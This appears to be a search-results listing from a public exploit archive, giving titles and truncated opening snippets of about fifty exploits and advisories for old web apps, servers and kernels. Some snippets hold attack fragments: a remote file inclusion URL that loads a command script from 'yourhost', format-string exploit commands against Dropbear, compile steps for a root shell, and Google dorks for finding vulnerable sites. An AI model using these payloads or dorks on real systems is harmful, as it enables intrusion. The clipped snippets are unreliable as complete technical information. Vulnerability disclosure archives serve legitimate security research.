41207 matches found
ID Automation Linear Barcode - ActiveX Denial of Service
ID Automation Linear Barcode - ActiveX Denial of Service 2007/05/13 ID Automation Linear Barcode ActiveX Control IDAutomationLinear6.dll v. 1.6.0.5 DoS url: http://www.idautomation.com/ price: from...
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion RFI Weatimages Hack Script name : Weatimages Script Download Address: http://www.hotscripts.com/jump.php?listingid=52592&jumptype=1 Demo site: http://www.nazarkin.name/projects/weatimages/demo/index.php?inilangpack=shelladress Google Dork : inurl:...
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858...
Coppermine Photo Gallery 1.4.9 - SQL Injection
Coppermine Photo Gallery 1.4.9 - SQL Injection !/usr/bin/php ?php / Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability Note: Requires a valid user account. Usage: php script.php host path table prefix user id username password Usage Example: php script.php domain.com /coppermine/...
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 2 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...
n@board 3.1.9e - naboard_pnr.php Remote File Inclusion
n@board 3.1.9e - naboard_pnr.php Remote File Inclusion n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability Turkish Hacker's Discovered By : mdx and TheBatHacker Cyber-Warrior TIM Ay ve Yıldızlar Geceye Yakışır... the moon...
phpBB Shadow Premod 2.7.1 - Remote File Inclusion
phpBB Shadow Premod 2.7.1 - Remote File Inclusion Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability Discovered By Kw3RLn...
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow 1 29\08\06 There are doors I have yet to open, windows I have yet to look through. Going forward may not be...
Integramod Portal 2.x - functions_portal.php Remote File Inclusion
Integramod Portal 2.x - functions_portal.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 Integramod Portal Copyright...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Risk : High Class : Remote Script : User Home Pages Site : www.ravensportal.co.uk Thanx :...
PixelPost 1-5rc1-2 - Privilege Escalation
PixelPost 1-5rc1-2 - Privilege Escalation !/usr/bin/php -q -d shortopentag=on ? echo "Pixelpost = 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid...
EQdkp 1.3.0 - dbal.php Remote File Inclusion
EQdkp 1.3.0 - dbal.php Remote File Inclusion Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls...
PHPX 3.5.x - Admin login.php SQL Injection
PHPX 3.5.x - Admin login.php SQL Injection source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation coul...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary scri...
CA License Server - GETCONFIG Remote Buffer Overflow
CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. When malicious requests are received b...
Linux Kernel 2.2.25/2.4.24/2.6.2 - mremap() Local Privilege Escalation
Linux Kernel 2.2.25/2.4.24/2.6.2 - mremap() Local Privilege Escalation / mremap missing do_munmap return check kernel exploit gcc -O3 -static -fomit-frame-pointer mremappte.c -o mremappte ./mremappte suid shell Vulnerable kernel versions are all...
Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5/SP6 French) - File Template Buffer Overflow (MS03-036)
Microsoft WordPerfect Document Converter Windows NT4 Workstation SP5/SP6 French - File Template Buffer Overflow MS03-036 Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 Exploit with several targets Find your own return address with : findhex dllna...
Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass
Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass source: https://www.securityfocus.com/bid/6619/info A vulnerability has been reported for ScanMail for Microsoft Exchange. The vulnerability allows a remote attacker to bypass existing authentication mechanisms and obtain access to...
Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service
Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service // source: https://www.securityfocus.com/bid/5975/info ZoneAlarm is a firewall software package designed for Microsoft Windows operating systems. It is distributed and maintained by Zone Labs. ZoneAlarm does not properly handle some types o...
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Local Buffer Overflow
SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Local Buffer Overflow // source: https://www.securityfocus.com/bid/3573/info Parallel Make pmake is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs...
Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service
Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service source: https://www.securityfocus.com/bid/2072/info Cisco Catalyst is a high speed switch implemented in local area networks. The telnet server that is built into the Catalyst firmware for remote...
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password source: https://www.securityfocus.com/bid/1216/info ICECap Manager is a management console for BlackICE IDS Agents and Sentries. By default, ICECap Manager listens on port 8081, transmits alert messages to another...
Phorum 3.0.7 - auth.php3 Backdoor Access
Phorum 3.0.7 - auth.php3 Backdoor Access source: https://www.securityfocus.com/bid/2274/info Phorum is a freely available, open source, popular WWW Board written by Brian Moon. It is designed to enhance the services offered on a web page, allow users to interact with one another through bulletin...
Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)
Majordomo 1.94.4/1.94.5 - Local -C Parameter 2 // source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo or one of...
Network Associates Gauntlet Firewall 5.0 - Denial of Service
Network Associates Gauntlet Firewall 5.0 - Denial of Service // source: https://www.securityfocus.com/bid/556/info There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a...
HP-UX 10.20 newgrp - Local Privilege Escalation
HP-UX 10.20 newgrp - Local Privilege Escalation source: https://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=...
ATutor 2.2.4 - id SQL Injection
ATutor 2.2.4 - id SQL Injection Exploit Title: ATutor 2.2.4 - 'id' SQL Injection Date: 2020-02-23 Exploit Author: Andrey Stoykov Vendor Homepage: https://atutor.github.io/ Software Link: https://sourceforge.net/projects/atutor/files/latest/download Version: ATutor 2.2.4 Tested on: LAMP on Ubuntu...
Online Job Portal 1.0 - user_email SQL Injection
Online Job Portal 1.0 - user_email SQL Injection Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
piSignage 2.6.4 - Directory Traversal
piSignage 2.6.4 - Directory Traversal Exploit Title: piSignage 2.6.4 - Directory Traversal Date: 2019-11-13 Exploit Author: JunYeong Ko Vendor Homepage: https://pisignage.com/ Version: piSignage before 2.6.4 Tested on: piSignage before 2.6.4 CVE : CVE-2019-20354 Summary: The web application...
Small CRM 2.0 - Authentication Bypass
Small CRM 2.0 - Authentication Bypass Exploit Title: Small CRM 2.0 - Authentication Bypass Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/small-crm-php/ Version: V2.0 Tested on: Windows CVE : N/A...
Bullwark Momentum Series JAWS 1.0 - Directory Traversal
Bullwark Momentum Series JAWS 1.0 - Directory Traversal Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal Date: 2019-12-11 Author: Numan Türle Vendor Homepage: http://www.bullwark.net/ Version : Bullwark Momentum Series Web Server JAWS/1.0 Software Link :...
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2019-12-06 Exploit Author: Hodorsec Vendor Homepage: http://www.yachtcontrol.nl/en/ Version: 1.0 Software Link:...
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Author : omurugur Software link: https://www.oracle.com/tr/applications/siebel/ Effective version : Oracle Siebel Sales 8.1 CVE: N/A Examples Request; POST...
logrotten 3.15.1 - Privilege Escalation
logrotten 3.15.1 - Privilege Escalation Exploit Title: logrotten 3.15.1 - Privilege Escalation Date: 2019-10-04 Exploit Author: Wolfgang Hotwagner Vendor Homepage: https://github.com/logrotate/logrotate Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1 Version: all version...
GoAhead 2.5.0 - Host Header Injection
GoAhead 2.5.0 - Host Header Injection Exploit Title: GoAhead Web server HTTP Header Injection. Shodan Query: Server: Goahead Discovered Date: 05/07/2019 Exploit Author: Ramikan Vendor Homepage: https://www.embedthis.com/goahead/ Affected Version: 2.5.0 may be others. Tested On Version: 2.5.0 in...
Tableau - XML External Entity
Tableau - XML External Entity Exploit Title: Tableau XXE Google Dork: N/A Date: Reported to vendor July 2019, fix released August 2019. Exploit Author: Jarad Kopf Vendor Homepage: https://www.tableau.com/ Software Link: Tableau Desktop downloads: https://www.tableau.com/products/desktop/download...
Sar2HTML 3.2.1 - Remote Command Execution
Sar2HTML 3.2.1 - Remote Command Execution Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web...
macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles
macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false...
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. POC Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link:...
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling...
Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access
Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access / For constructors, Spidermonkey implements a "definite property analysis" 1 to compute which properties will definitely exist on the constructed objects. Spidermonkey then directly allocates the constructed objects with the final...
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable entry with...
Microsoft Windows (x84/x64) - Error Reporting Discretionary Access Control List Local Privilege Escalation
Microsoft Windows x84/x64 - Error Reporting Discretionary Access Control List Local Privilege Escalation EDIT: Apparently this was patched earlier this month.. so whatever. Windows Error Reporting Arbitrary DACL write It can take upwards of 15 minutes for the bug to trigger. If it takes too long,...
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution (Metasploit)
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module...
Airbnb Clone Script - Multiple SQL Injection
Airbnb Clone Script - Multiple SQL Injection Exploit Title: Homey BNB Airbnb Clone Script - Multiple SQL Injection Date: 27.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/ Demo Site: http://sitedemos.in/homeybnb/ Version: V4 Tested on...